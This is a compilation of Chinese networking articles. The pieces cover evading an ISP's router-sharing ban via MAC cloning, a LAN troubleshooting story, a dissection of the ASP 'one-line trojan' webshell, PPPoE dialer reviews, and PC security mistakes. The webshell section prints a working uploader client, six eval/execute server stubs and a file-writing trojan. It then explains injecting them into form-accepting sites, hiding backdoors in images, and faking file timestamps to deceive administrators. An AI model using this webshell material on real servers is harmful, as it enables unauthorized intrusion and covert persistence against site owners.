讲述电信禁止路由上网的最佳破解方法

讲述电信禁止路由上网的最佳破解方法

ADSL共享上网有两种方式，一种是代理，一种是地址翻译（NAT），大家常说的路由方式其实就是NAT方式，其实路由和NAT的原理还是有区别的，这里不作讨论，现在的ADSL猫一般都有NAT的功

能，用它本身的功能实现共享上网是比经济方便，本文主要讨论这种方式。

要想阻断一台以上的计算机上网必须能发现共享后边的机器是否多于一台，NAT的工作原理如图一所示，经过NAT转换后访问外网的内网的计算机的地址都变成了192.16 8.0.1而且MAC地址也转换成了ADSL的MAC地址，也就是说，从原理上讲，直接在ADSL出口抓经过NAT转换的包是不能发现到底有几台机器在上网。那是如何发现的呢？经过研究发现它是采用多种方法探测用户是否用共享方式上网，从而进行限制，下面分别进行破解:

一.检查同一IP地址的数据包中是否有不同的MAC地址，如果是则判定用户共享上网。破解的办法是把每台机的MAC地址改为一样.修改的方法如下:

首先要获取本机的MAC：MAC地址是固化在网卡上串行EEPROM中的物理地址，通常有48位长。以太网交换机根据某条信息包头中的MAC源地址和MAC目的地址实现包的交换和传递。

⑴在Windows 98/Me中，依次单击“开始”→“运行” →输入“winipcfg”→回车。

⑵在Windows 2000/XP中，依次单击“开始”→“运行”→输入“CMD”→回车→输入“ipconfig /all”→回车。

或者右键本地连接图标、选择状态然后点击支持选项卡，这里“详细信息”中包含有MAC和其它重要网络参数。

1、如果你的网卡驱动有直接提供克隆MAC地址功能,如RealTek公司出的RTL8139芯片，那恭喜你了,点击“开始→设置→控制面板”，双击“网络和拨号连接”，右键点击需要修改MAC地址的网卡图标，并选择“属性”。在“常规”选项卡中，点击“配置”按钮，点击“高级”选项卡。在“属性”区，你应该可以看到一个称作 “Network Address”或“Locally Administered Address”的项目，点击它，在右侧“值”的下方，输入你要指定的MAC地址值。要连续输入12个数字或字母，不要在其间输入“-”。重新启动一次系统后设置就会生效了（Windows 98和Windows 2000/XP用户操作略有区别，请参照系统说明操作）

2、如果你的网卡驱动没有提供克隆MAC地址功能,那下面分别提供一些方法,希望能找到一个适合你的

WIN98下:

a.在"网上邻居"图标上点右键，选择"属性"，出来一个"网络"对话框，在"配置"框中，双击你要修改的网卡，出来一个网卡属性对话框。在"高级"选项中，也是点击"属性"标识下的"Network Address"项，在右边的两个单选项中选择上面一个，再在框中输入你要修改的网卡MAC地址，点"确定"后，系统会提示你重新启动。重新启动后，你的网卡地址就告修改成功！！

b.点击“开始→运行”，键入“winipcfg”，选择你要修改的网卡，并记录MAC地址值。点击“开始→运行”，输入“regedit”运行注册表编辑器（在修改注册表前，一定要先备份注册表），依据注册表树状结构，依次找到“HKEY_LOCAL_MACHINESystemCurrentControlSetServicesClassNet”，你会看到类似“0000”、“0001”、“0002”等样子的子键。从“0000”子键开始点击，依次查找子键下的“DriverDesc” 键的内容，直到找到与我们查找的目标完全相同的网卡注册表信息为止。

当找到正确的网卡后，点击下拉式菜单“编辑→新建→字符串”，串的名称为“networkaddress”，在新建的“networkaddress”串名称上双击鼠标，就可以输入数值了。输

入你指定的新的MAC地址值。新的MAC地址应该是一个12位的数字或字母，其间没有“-”，类似“00C095ECB761”的样子。

有两种方法激活新的MAC地址：

如果你使用的是普通内置网卡，就必须重新启动计算机来使修改生效。

如果你使用的是PCMCIA卡，你可以按照下面的步骤操作而不必重新启动操作系统：运行winipcfg，选择并释放DHCP设置，关闭winipcfg。打开控制面板或系统托盘“PC Card (PCMCIA)”，停止并弹出PCMCIA网卡。重新插入PCMCIA网卡，打开winipcfg，选择并刷新DHCP设置，运行winipcfg，确定修改的MAC地址已生效。

WIN2000下:

a.在桌面上网上邻居图标上点右键，选"属性"，在出来的"网络和拨号连接"窗口中一般有两个图标，一个是"新建连接"图标，一个是"我的连接"图标。如果你的机器上有两个网卡的话，那就有三个图标了。

b.如果你只有一个网卡，那就在"我的连接"图标上点右键，选"属性"，会出来一个"我的连接 属性"的窗口。在图口上部有一个"连接时使用："的标识，下面就是你机器上的网卡型号了。在下面有一个"配置"按钮，点击该按钮后就进入了网卡的属性对话框了，这个对话框中有五个属性页，点击第二项"高级"页，在"属性"标识下有两项：一个是"Link Speed/Duplex Mode",这是设置网卡工作速率的，我们需要改的是下面一个"Network Address",点击该项，在对话框右边的"值"标识下有两个单选项，默认得是"不存在" ，我们只要选中上面一个单选项，然后在右边的框中输入你想改的网卡MAC地址，点"确定"，等待一会儿，网卡地址就改好了，你甚至不用停用网卡！

你也可以在"设置管理器"中，打开网卡的属性页来修改，效果一样。


解惑内网无法上网的故障

为了申请初中级计算机常设考点，单位于去年不惜耗费几十万元费用组建了一个标准的局域网机房，主要用于学生初中级培训和考试;该局域网主要包括36台P4级别的方正品牌电脑，两台级联的CISC

O品牌10M/100M自适应交换机，以及一台安装有两块网卡的HP服务器，其中服务器中安装的是Windows 2000 Server操作系统，其他工作站安装的都是初中级计算机考试必需的Windows 98操作系统。

最近单位由于要举办一期Internet方面的培训班，为了能够实现在线培训的目的，单位领导要求笔者想办法对局域网进行一次小小的改造，以便让每台工作站都能顺利、便捷地访问Internet内容。接到任务后，笔者首先对局域网目前的连接情况进行了检查，发现所有工作站都是连接到交换机中的，Windows 2000服务器通过其中的一块网卡，直接与Internet进行了连接，另外一块网卡也连接到了交换机中。有鉴于此，笔者脑海中首先想到的就是通过Windows 2000系统内置的Internet连接共享功能，来实现领导提出的内网也能上网的要求;这种方法的大致思路是:服务器其中的一块网卡通过交换机直接与局域网内网相连接，另外一块网卡直接与Internet网络连接，然后对连接Internet的网卡启用连接共享功能，从而实现所有内网工作站都能上网的目的。

根据这样的思路，笔者和另外一名同事迅速行动起来，买来了网线、水晶头，并准备好了相关组网工具，制作好了用于连接Internet的一根网线;并将其中的一端水晶头连接到服务器的一块网卡上，另外一端水晶头连接到宽带光纤转换设备的RJ-45端口中。紧接着，打开服务器的网络属性设置窗口，进入到TCP/IP参数设置界面，为连接Internet的网卡分配了一个独立的、公网IP地址，同时设置好了网关IP地址和DNS服务器地址;下面，笔者又用手工方式启用了外网网卡的Internet连接共享功能，一旦该功能被启用正常后，服务器中连接内网的另外一块网卡IP地址自动变成了“192.168.0.1”，网络掩码地址也自动被设置为了“255.255.255.0”，此时你再用手工方式设置好连接内网网卡的DNS参数，最后单击“确定”按钮，完成服务器端的所有参数设置任务。下面，笔者和同事分头行动，分别打开每一台工作站的TCP/IP参数设置窗口，将它们的IP地址按照次序设置为192.168.0.2、192.168.0.3……，并且将网络掩码地址统一设置为“255.255.255.0”，将网关地址统一设置为“192.168.0.1”，再将DNS服务器的IP地址统一设置成和服务器的DNS一样的地址。

完成所有的设置任务后，随意找了一台工作站，并打开系统运行对话框，在其中执行了“ping 192.168.0.1”命令，执行结果表明局域网的内部连接以及网络设置一切正常，笔者满以为现在任意一台工作站肯定都能访问Internet中的内容了。恰好此时，另外一名同事需要到网上下载一个压缩软件，可打开IE浏览器、输入华军软件园的网址后，发现该网站的主页面根本无法打开;随后该同事又输入了另外一个网址，但还是无法上网。从IE浏览器窗口的状态栏中，笔者发现目标网站的域名地址已经被正确解析成IP地址了，不过网站内容就是无法打开。

会不会是服务器端还没有连接上网呢?但当笔者在服务器端打开IE浏览器窗口，随意输入一个网址时，网页内容很快就显示出来了，很明显服务器端可以正常上网;难道是同事选用的那台工作站本身有问题?于是笔者又在刚才的工作站中，打开系统运行对话框，然后ping了一下网关地址和外网网站的一些地址，测试结果都表明网络连接一切正常。既然服务器端是正常的，网络连接设置也很正常，会不会是客户端程序——IE浏览器发生了损坏呢?到了这会，笔者只好想到什么就做什么了;打开系统工作站的运行对话框，并在其中执行字符串命令“sfc /scannow”，随后系统果然发现了IE有几处受到损坏，笔者逐一将它们修复好了，然后把计算机系统重新启动了一下，再次打开IE浏览器进行测试时，发现内网还是无法上网。笔者仍然不甘心，又依次单击IE浏览器菜单栏中的“工具”/“Internet选项”命令，对浏览器的上网设置进行了仔细检查，检查之后发现“局域网设置”处的“自动检测设置”选项并没有被选中;但笔者将该选项重新选中，并退出Internet选项设置窗口，再对上网进行测试时，结果还是没有丝毫进展。不得已笔者又打开了另外一台工作站进行上网测试，可结果仍然是无法上网;更让人感到意外的是，笔者不论打开哪台工作站，最终测试的结果都是一样，那就是无法打开网页内容。

天呀，忙活到现在，难道一点成就都没有?笔者情不自禁地感叹了起来!感叹之余，笔者又将目光转移到服务器上了，毕竟每一台工作站都不能上网，则基本上就能断定内网无法上网故障与客户端无关。打开服务器的网上邻居窗口，笔者发现其他工作站的“身影”都能在这里看到，而且服务器端不论访问哪个网站，IE浏览器都能很快将网站内容显示出来，这些现象表明服务器在网络参数设置方面应该没有任何问题。接着笔者想会不会是服务器中的病毒在“捣乱”呢?先不管服务器有没有病毒，还是稳妥一点，找来最新版本的瑞星杀毒软件，对服务器系统进行一下彻底查杀吧;在漫长的病毒查杀等待之后，服务器中果然被找出了几个新型病毒，不过遗憾的是这些病毒跟内网无法上网故障几乎没有关系，因为在这些病毒被清除干净之后，内网还是那个不能上网的内网。

难道内网真的就没有办法上网了吗?在万般无奈之下，笔者静下心来对可能影响上网的所有系统设置，重新在脑海中梳理了一遍;突然想到该服务器曾经被设置作为局域网的路由器，会不会是系统的“路由和远程访问”功能影响了内网上网呢?于是笔者一不做、二不休，打开了系统服务列表窗口，将其中的“路由和远程访问”服务暂时设置为禁用，然后再将服务器系统重新启动了一下。满以为这一次故障肯定能迎刃而解，但实际的上网测试再次给了笔者一次无情的打击，内网竟然还是那样“无动于衷”!

就在笔者打算彻底放弃时，屏幕上突然弹出防火墙窗口，提示笔者有应用程序需要访问外部网络，这样的提示对于笔者来说无疑就是雪中送炭，因为笔者忙活到现在竟然把软件的作用给忽略了。笔者认定内网无法上网故障肯定是防火墙引起的，于是马上将开启的防火墙迅速关闭了，然后又打开了IE浏览器进行了测试，但内网还是不能打开网页内容。尽管如此笔者还是没有灰心，为了把防火墙或者其他软件对服务器的影响降低到最小限度，笔者打算将一些暂时用不到软件以及防火墙先彻底卸载掉，以便在服务器处于相对“干净”的环境下进行内网上网测试。当打开服务器中的控制面板窗口，双击其中的“添加/删除程序”图标，准备在其后弹出的应用程序列表窗口中执行软件卸载动作时，笔者发现服务器中竟然同时安装了MS-Proxy和WinGate两个代理服务器软件。哦，原来该服务器曾经被作为局域网的代理服务器，其他工作站通过MS-Proxy或WinGate代理软件实现了共享上网目的!难道是MS-Proxy或WinGate软件在后台悄悄运行，导致了Internet连接共享上网方式和代理服务器共享上网方式发生了冲突，笔者下意识地认为这可能就是内网无法上网的症结所在。

为了验证自己的想法，笔者在“添加/删除程序”应用程序列表窗口中，将MS-Proxy和WinGate两个代理服务器软件全部移出了系统，并且又将服务器系统重新启动了一下;之后，笔者又小心翼翼地打开某台工作站的IE窗口，再次输入了华军软件园的网站地址，单击回车键后，IE又开始了搜索网站地址的行动，幸运的是这次IE终于没有让我失望，很快将华军软件园的主页面内容打开了。到了这里，笔者还不是很放心，又随意输入了其他网站的URL地址进行了测试，测试结果终于让笔者如释重负，内网终于可以随意访问外网内容了。至此，我们不难发现本例中的内网无法上网故障，其实是由与共享上网有关的软件之间的冲突造成的。

全面详尽剖析一句话asp木马

全面详尽剖析一句话asp木马

所谓一句话插马，就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。它分为一句话asp马、一句话php马……，本文就一句话asp木马来做一次详尽的剖析。在此首先要感谢前辈们的探究！

一：基础篇

首先我们看一下最常用的一句话木马客户端的代码

＜html＞

＜head＞

＜title＞一句话客户端＜/title＞

＜style type="text/css"＞

＜!--

body {

background-color: #FFFFFF;

}

.lygf {

border: 1px solid #660069;

font-size: 12px;

}

--＞

＜/style＞

＜/head＞

＜body＞

＜table width="500" border="0" align="center" class="lygf" height="14" cellspacing="0"＞

＜tr＞

＜td height="1" width="794"＞

＜form name="lygf" method="post"＞

＜input name="add" type="text" id="add" size="97" value="http://"＞

＜input type="submit" value="枫" onClick="this.form.action=this.form.add.value;"＞

＜input type="hidden" name="fk" id="fk" value="Execute("Session(""fk"")=request(""*""):Execute(Session(""fk""))")"＞

＜/td＞

＜/tr＞

＜tr＞

＜td height="100" width="794"＞

＜textarea name="*" cols="100" rows="9" width="45"＞

set lP=server.createObject("Adodb.Stream")

lP.Open

lP.Type=2

lP.CharSet="gb2312"

lP.writetext request("lygf")

lP.SaveToFile server.mappath("fk.asp"),2

lP.Close

set lP=nothing

response.redirect "fk.asp"＜/textarea＞

＜/td＞

＜/tr＞

＜tr＞

＜td height="1" width="794"＞

＜textarea name="lygf" cols="100" rows="15" width="45"＞

写入你的大马＜/textarea＞

＜/td＞

＜/tr＞

＜tr＞

＜td width="794" height="7"＞

＜font color="#000000"＞提供六个服务端:＜/font＞

＜br＞

1. ＜%eval request("fk")%＞

＜br＞

2. ＜%execute request("fk")%＞

＜br＞

3. ＜%execute(request("fk"))%＞

＜br＞

4. ＜%On Error Resume Next%＞＜%eval request("fk")%＞

＜br＞

5. ＜script language=VBScript runat=server＞execute request("fk")＜/Script＞

＜br＞

6. ＜script language=VBScript runat=server＞eval request("fk")＜/Script＞

＜br＞

＜br＞By 冷月孤枫 枫客:http://fk.3355.cn/ ... t;/font＞＜br＞

＜/td＞

＜/tr＞

＜/table＞

＜/body＞

＜/html＞

把上面的代码另存为htm的格式后就可以使用了，具体的使用说明在网页上可以看到

下面就带着大家一起分析一下上面的代码(html的一些最基本的知识就不做解释了)：

＜title＞一句话客户端＜/title＞ 显示在浏览器标题栏上面的文字，你可以自己更改

＜style type="text/css"＞

＜!--

body {

background-color: #FFFFFF; 背景颜色

}

.lygf {

border: 1px solid #660099; 边框属性

font-size: 12px; 字体大小

}

--＞ 本页面所要用到的样式

＜form name="lygf" method=post＞ 创建一个form对象，其中name的作用是用作一个枢纽把我们要插入的马的内容传递给form，以post方式提交给下面的连接，而不是get，用post提交IIS是不记入日志的

＜input name="add" type="text" id="add" size="97" value="http://"＞创建一个用于提交的输入框(text)用于写地址(add)，长度是97个字节，value=是默认的内容

＜input type="submit" value="枫" onClick="this.form.action=this.form.add.value;"＞创建一个按钮用于提交(submit)，后面的部分是把上面value的值赋给form去post

＜input type="hidden" name="fk" id="fk" value="Execute("Session(""fk"")=request(""*""):Execute(Session(""fk""))")"＞通过建立一个隐藏域，把fk与下面name的值*关联，用session保存代码然后执行,这句借用了海洋的客户端，不过那样不怎么好用

＜textarea name="*" cols="100" rows="9" width="45"＞ textarea就是论坛中的发言框。在HTML语言中，textarea、input都是属于“文本域”的

set lP=server.createObject("Adodb.Stream") CreateObject创建并返回对 Automation 对象的引用，应用于Server 对象；Adodb.Stream是ADO的Stream对象,提供存取二进制数据或者文本流,从而实现对流的读、写和管理等操作；对象创建后，就可以在代码中使用定义的对象变量(IP)引用此对象

lP.Open 打开这个变量

lP.Type=2 Type 指定或返回的数据类型，这里是以文本方式

lP.CharSet="gb2312" gb2312是指简体中文

lP.writetext request("lygf") Request 对象在 HTTP 请求期间，检索客户端浏览器传递给服务器的值，这里是lygf，要和下面文本框中的name=lygf相对应，writetext允许对现有的 text、ntext 或 image 列执行最小日志记录的交互式更新。WRITETEXT 将覆盖受其影响的列中的所有现有数据，在这里的作用就是取得下面的文本框里的木马的内容

lP.SaveToFile server.mappath("fk.asp"),2 这句很好懂，就是以覆盖文件的方式向服务器的同文件目录下写入fk.asp

lP.Close 关闭对象变量

set lP=nothing 释放Adodb.Stream对象

response.redirect "fk.asp" 在这里起到转向作用，转到我们刚刚写入的fk.asp

＜textarea name=lygf cols=120 rows=10 width=45＞添入生成木马的内容＜/textarea＞又创建一个文本框用于写马的内容，这里的name要和上面的一样

给大家提供一个小马：

＜%dim objfso%＞

＜%dim fdata%＞

＜%dim objcountfile%＞

＜%on error resume next%＞

＜%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")%＞

＜%if trim(request("syfdpath"))＜＞"" then%＞

＜%fdata = request("cyfddata")%＞

＜%set objcountfile=objfso.createtextfile(request("syfdpath"),true)%＞

＜%objcountfile.write fdata%＞

＜%if err =0 then%＞

＜%response.write "＜font color=red＞save success!＜/font＞"%＞

＜%else%＞

＜%response.write "＜font color=red＞save unsuccess!＜/font＞"%＞

＜%end if%＞

＜%err.clear%＞

＜%end if%＞

＜%objcountfile.close%＞

＜%set objcountfile=nothing%＞

＜%set objfso = nothing%＞

＜%response.write "＜form action='''' method=post＞"%＞

＜%response.write "＜input type=text name=syfdpath width=32 size=50＞"%＞

＜%response.write "＜br＞"%＞

＜%=server.mappath(request.servervariables("script_name"))%＞

＜%response.write "＜br＞"%＞

＜%response.write "＜textarea name=cyfddata cols=80 rows=10 width=32＞＜/textarea＞"%＞

＜%response.write "＜input type=submit value=go＞"%＞

＜%response.write "＜/form＞"%＞

后面的一些代码都是一些使用说明，提供六个服务端

1. ＜%eval request("fk")%＞

2. ＜%execute request("fk")%＞

3. ＜%execute(request("fk"))%＞

4. ＜%On Error Resume Next%＞＜%eval request("fk")%＞

5. ＜script language=VBScript runat=server＞execute request("fk")＜/Script＞

6. ＜script language=VBScript runat=server＞eval request("fk")＜/Script＞

大家试着用

解释以下：

在VBScript 中，x = y可以有两种解释。第一种方式是赋值语句，将y的值赋予x。第二种解释是测试x 和y是否相等。如果相等，result为True；否则result为False。Eval方法总是采用第二种解释，而Execute语句总是采用第一种。

Execute 执行一个或多个指定的语句，我们用来执行asp代码，它可以执行赋值操作，不过当POST的参数x为空时execute函数会出错，所以要加一句容错语句

Eval 计算一个表达式的值并返回结果，它的参数可以是包含任何有效VBScript表达式的字符串，也就可以执行asp代码，但它不能执行赋值操作，不过当参数为空不会出错

Request 对象在 HTTP 请求期间，检索客户端浏览器传递给服务器的值这里是fk

好，现在大家都知道了各个函数的意思，那我就把一句话木马的工作原理给大家讲一下：通过服务端的request('fk')的作用是读取客户端文件中第一个文本框中的内容(name值被命名为lygf的部分),然后通过Execute函数或eval函数执行其内容，之后的过程我都在上面说明了，写入大马，就得到了我们想要的webshell

二：应用篇

下面我们就来谈谈一句话asp木马的应用，大家应该都回用吧！哈哈

1.入侵：把一句话插入任何以asp结尾的文件中就能实现入侵。网上很多程序中或者是留言本或者是评论或者是申请表单等等吧，凡是想服务器提交数据的页面只要存在着数据过滤不严，可以插入一句话，大多都能入侵。但我们首先需要做的是，要确认它的数据库必须是以asp结尾的，并且要知道它的数据库路径。如果失败了，大家要自己找一下原因：可能是一句话被包围在一个函数内了(结束它)，可能是被过滤＜% %＞，那大家就可以选择第四个服务端，还有我们可以吧一句话拆分，URLENCODE转换，代码加密等等，大家自由发挥吧！改了文件后要用海洋把文件最后修改时间改回去，这样可以骗过一些管理员！哈哈

2.后门：用它做后门简直太爽了，平时我们用的木马用专业的asp木马查找工具都是可以轻而易举的查出来的，用它做后门就不容易查处来了，因为它可以变形啊，拆分，URLENCODE转换，代码加密等等。可以把它放在asp网页的页首、页尾，不过可能导致页面不正常，容易被发现；可以放在asp页面的空函数内，实验了可以用，页面也正常；可以放在任何文件里面(图片、文本、压缩文件等)，建议用图片，因为数量多，不易被发现，把它插入到图片后在一个asp页面中写入＜!--#include file="***/****.***" --＞后面省略的是你插入的文件的地址,也可以用copy命令使图片与asp文件合二为一copy 1.gif /b + asp.asp /a asp.gif参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。还有很多期待发现的方法，只要能想就能做，心有多大世界就有多大，哈哈(比如一台主机我们可以给它架设IIS或微型IIS，后用一句话留后门，一句化在加上系统、只读、隐藏的属性，把文件夹放深一点，就差不多了)。改了文件后要用海洋把文件最后修改时间改回去，这样可以骗过一些管理员！哈哈

三：防范篇

1.是要隐藏网站的数据库，不要让攻击者知道数据库文件的链接地址，把数据库放深一点，名字起的奇怪一点。

2.防止暴库，在数据库连接文件中加入容错代码、设置好IIS转向错误页面等

3.防止用户提交的数据未过滤漏洞，对用户提交的数据进行过滤，替换一些危险的代码等，比较好的方法就是过滤＜＞,现在TX就过滤这个东西，导致我们不能DIY了

另外要注意的是：因为一句话木马调用了Adodb.Stream组件所以如果服务器端禁止Adodb.Stream组件是不会写入成功的！还有就是权限的问题，如果当前的虚拟目录禁止user组或者everyone写入操作的话那么也是不会成功的，不过这种情况很少见，一般都会有写的权限的！

但愿本文对你有所帮助，大家也可以到我的博客与我讨论，祝愿大家都能DIY出自己的一句话！

看看哪款ADSL虚拟拨号软件适合你？

看看哪款ADSL虚拟拨号软件适合你？

目前ADSL都采用虚拟拨号——PPPoE技术，但用户使用的PPPoE软件却不尽相同。针对不同的情况，怎么选择适合自己的PPPoE虚拟拨号软件呢？今天我们就来认识一下几款PPPoE拨号软

件，看看哪款更适合你。

WinPoEt

WinPoEt的优点在于安装方便，简单易用，纯粹作为Windows PPPoE程序强化版。WinPoEt在程序的核心上改用Windows原有的拨号网络系统，而非如同NTS EnterNet完全独立形式操作。安装过程中，WinPoEt会在系统网络中新增一个虚拟网卡，作为中央管理系统以模拟VPN方式运作。其设计以简单为主，基本上没有太多的设定可供用户选择。

适合对象：初级ADSL用户。

NTS EnterNet

在众多的PPPoE虚拟拨号软件中，以EnterNet最为流行，很多宽带服务供应商都把它作为官方的上网拨号软件。EnterNet 300最大的特点在于它不需要依赖Windows系统本身的拨号网络功能。安装过程中EnterNet 300会在系统中添加一张虚拟的PPPoE网卡，所有网络介入程序及PPPoE功能都会交由这张虚拟网卡处理。安装完成后，EnterNet会通过对ADSL Modem的自动搜索列出可供接驳的BRAS(宽带接入服务器)接入系统。NTS EnterNet的功能较多，例如其高级选项功能可以详细列出所有封包记录资料及详细的Routing Table。另外程序中内建有Ping功能以便即时分析网络线路的回应时间，更可配合封包记录找出宽带网络事故的问题所在。

适合对象：不熟悉系统指令的用户。

RasPPPoE

RasPPPoE为德国出品，主要在Windows原有的拨号网络功能上增加了对PPPoE的通信协议的支持，最新版RasPPPoE V0.98b已全面支持Windows NT和Windows XP。不过由于RasPPPoE并没有安装程序，要安装得花一番功夫才行。它是免费软件，在登录网络的反应速度上，比其他PPPoE软件好得多。而且它是纯协议设计，与其他网络资源相冲突的概率较低，尤其适合一些装有多种网络的用户使用，所以不少宽带用户改用RasPPPoE代替服务商提供的拨号程序。

笔者建议大家到其官方网站www.rasPPPoE.com下载RasPPPoE v0.9x的正式版本，它提供了自动安装及设定功能，只需按一下运行安装程序就可以代为在网络上架设PPPoE功能。但它对于Windows2000/XP的用户来说仍有弊端，因为它没有将RasPPPoE加入Services之内，所以不能在进入Windows系统之后自动连线上网。假如希望在Windows 2000/XP中加入Services的最好选用其他拨号程序。

适合对象：装有多种网络的用户。

Windows XP PPPoE

Windows XP是第一套整合PPPoE上网功能的Windows系统，不少宽带服务提供商建议用户直接使用Windows XP系统内置的PPPoE功能上网。在Windows XP中无需再安装任何外挂的PPPoE程序或加入PPPoE协议，只需要按几个简单的步骤就可以在数分钟内完成设置宽带上网。

但是其功能也有先天不足：其一，Windows XP内建的PPPoE功能只可支持MTU 1480，在优化宽带的时候就会显得无能为力，也会导致网络较不稳定；其次，虽然自Windows 98开始就已经内置有网络共享功能以便多台电脑可以分享网络资源，但很可惜Windows XP内置的ICS对其内置的PPPoE支持很差，即便不少用户在设定过程中全无错误，最终也无法顺利共享上网。如果你打算用ICS功能共享上网，笔者建议使用RasPPPoE或NTS EnterNet取代Windows XP原有的PPPOE上网功能。

适合对象：不需要共享上网的用户。

NetVoyager

NetVoyager是一个韩国的免费PPPoE程序，名气远没有RasPPPoE大，但其功能及方便程度较RasPPPoE有过之而无不及。它跟RasPPPoE一样都是在原有的拨号网络功能上增加了对PPPoE协议的支持，但它却在Windows拨号网络之外加设了一个连接程序，可以自动分析选用哪一块网卡连接，对于装有多块网卡的用户相当适用。

其次，其连接程序可用于设定MTU value、防断线、自动连线，而其速度调整系统可以将速度提升到最佳状态。更重要的是NetVoyager采用“一按式”安装模式，只要安装后程序就会自动进行设定，并在重新开机后自动连线上网。若讲到宽带上网的话，NetVoyager相信会是目前众多PPPOE拨号程序中最好的一个，既简单又不失对宽带上网高级设置功能的支持。

适用对象：装有多块网卡的用户。

让你的电脑身处危险的傻事你做了几件

让你的电脑身处危险的傻事你做了几件

作者：hackmaster　来源：赛迪网安全社区

用户们总会用层出不穷的方法给自己惹上麻烦。他们会使用共享软件使自己暴露在入侵者面前或者忘记使用电压保护装置。与您的用户分享这个傻事清单，能够避免他们犯这些 原本可以避免发生的错误。

我们都做过傻事，计算机用户当然也不例外。无意中按错组合键或者在不知情的情况下在报错对话框上选了“确定”都可能会改变重要设置，这样会影响计算机的行为，甚至导致 系统崩溃。

紧张的新手经常会害怕某个错误操作会永久破坏计算机。幸运的是，结果并没有想象的那么严重。虽然如此，但是用户还是经常给计算机以及您的网络创造各种麻烦。以下是一些 您和您的用户能够引以为戒，远离可预防的问题的常见错误。

1、使用没有过电压保护的电源

这个错误真的能够毁掉计算机设备以及上面所保存的数据。您可能以为只在雷暴发生时，系统才会有危险，但其实任何能够干扰电路使电流回流的因素都能烧焦你的设备元件。有 时甚至一个简单的动作，比如打开与电脑设备同在一个电路中的设备（特别是电吹风、电加热器或者空调等高压电器）就能导致电涌，或者树枝搭上电线也能导致电涌。如果遇到 停电，当恢复电力供应时也会出现电涌。

使用电涌保护器就能够保护系统免受电涌的危害，但是请记住，大部分价钱便宜的电涌保护器只能抵御一次电涌，随后需要进行更换。不间断电源（UPS）更胜于电涌保护器，UPS 的电池能使电流趋于平稳，即使断电，也能给你提供时间从容的关闭设备。

2、不使用防火墙就上网

许多家庭用户会毫不犹豫的将电脑接上漂亮的新电缆或者DSL调制解调器开始上网，而没有意识到他们正将自己暴露在病毒和入侵者面前。无论是宽带调制解调器或者路由器中内置 的防火墙，还是调制解调器或路由器与电脑之间的独立防火墙设备，或者是在网络边缘运行防火墙软件的服务器，或者是电脑上安装的个人防火墙软件（如Windows XP中内置的ICF/Windows 防火墙，或者类似Kerio 或ZoneAlarm的第三方防火墙软件），总之，所有与互联网相连的计算机都应该得到防火墙的保护。

笔记本电脑上安装的个人防火墙的好处在于，当用户带着电脑上路或者插入酒店DSL或电缆端口，或者与无线热点相连接时，已经有了防火墙。拥有防火墙不是全部，你还需要确认 防火墙已经开启，并且配置得当，能够发挥保护作用。

3、忽视防病毒软件和防间谍软件的运行和升级

让我们面对现实: 防病毒程序非常令人讨厌。他们总是阻断一些你想要使用的应用，有时你不得不在安装新软件时先停止防病毒程序。而且为了保证效用，不得不经常进行升级。好象原来的版本总 是要过期，并催促您进行升级，在很多情况下，升级都是收费的。但是在现在的环境下，你无法承担不使用防病毒所带来的后果。 病毒、木马、蠕虫等恶意程序不仅会削弱和破坏系统，还能通过您的电脑向网络其他部分散播病毒。在极端情况下，甚至能够破坏整个网络。

间谍软件是另外一种不断增加的威胁；这些软件能够自行在电脑上进行安装（通常都是在你不知道的情况下），搜集系统中的情报然后发送给间谍软件程序的作者或销售商。防病 毒程序经常无法察觉间谍软件，因此请务必使用一个专业的间谍软件探测清除软件。

4、安装和卸载大量程序，特别是测试版程序

由于用户对最新技术的渴望，经常安装和尝试新软件。免费提供的测试版程序能够使您有机会抢先体验新的功能。另外还有许多可以从网上下载的免费软件和共享软件。我们知道 有些用户还曾经安装盗版软件或者“warez”。

您安装的软件数量越多，您使用含有恶意代码的软件，或者使用编写不合理能够导致系统工作不正常或者崩溃的软件的几率就更高。这样的风险远高于使用盗版软件。

即使您只会安装经过授权的最终版本的的商业软件，过多的安装和卸载也会弄乱注册表。不是所有的卸载步骤都能将程序剩余部分清理干净，这样的行为会导致系统逐渐变慢。

您应该只安装您真正需要使用的软件，只使用合法软件，并且尽量减少安装和卸载软件的数量。

5、磁盘总是满满的并且非常凌乱

频繁安装和卸载程序（或增加和删除任何类型的数据）都会使磁盘变得零散。信息在磁盘上的保存方式导致了磁盘碎片的产生：在新的空磁盘中保存文件时，文件被保存在连续的 簇上。如果您删除的文件占用了5个簇，然后保存了一个占用8个簇的文件，那么头5个簇的数值会保存在删除产生的5个空簇中，剩余的3个则保存在下三个空的簇中。这样就使得文 件变得零散或者分裂。然后在访问文件时，磁头不会同时找到文件的所有部分，而是到磁盘的不同地址上找回全部文件。这样使得访问速度变慢。如果文件是程序的一部分，程序 的运行速度就会变慢。过于零散的磁盘运行速度极慢就象在爬行一样。

你可以使用Windows里带有的磁盘碎片整理工具（程序| 附件 | 系统工具） 或者第三方磁盘碎片整理工具defrag来重新安排文件的各个部分，以使文件在磁盘上能够连续存放。

另外一个常见的能够导致性能问题和应用行为不当的原因是磁盘过满。许多程序都会生成临时文件，运行时需要磁盘提供额外空间。你可以使用Windows XP的磁盘清理工具或者第三方程序查找和删除很少用到的文件，或者你也可以手动删除文件来释放磁盘空间。

6、打开所有的附件

有些人就是无法控制自己：收到带有附件的电子邮件就好象收到一份意料之外的礼物。你只是想窥视一下是什么附件。但是就好象您门前的包裹里可能有炸弹一样，电子邮件中的 文件附件可能包含能够删除文件或系统文件夹，或者向地址簿中所有联系人发送病毒的编码。

最容易被洞察的危险附件是可执行文件（即可以运行的编码），扩展名为.exe，.cmd以及其他很多类型。不能自行运行的文件，如Word的.doc文件，以及Excel的.xls文件，能够含有内置的宏。脚本(Visual Basic, JavaScript, Flash等) 不能被计算机直接执行，但是可以通过程序进行运行。

过去一般认为纯文本文件(.txt)或图片文件(.gif, .jpg, .bmp)是安全的，但是现在不是了。文件扩展名也可以伪装；入侵者能够利用Windows默认的不显示普通的文件扩展名的设置，将可执行文件名称设为类似greatfile.jpg.exe这样。 实际的扩展名被隐藏起来，只显示为greatfile.jpg。这样收件人会以为它是图片文件，但实际上却是恶意程序。

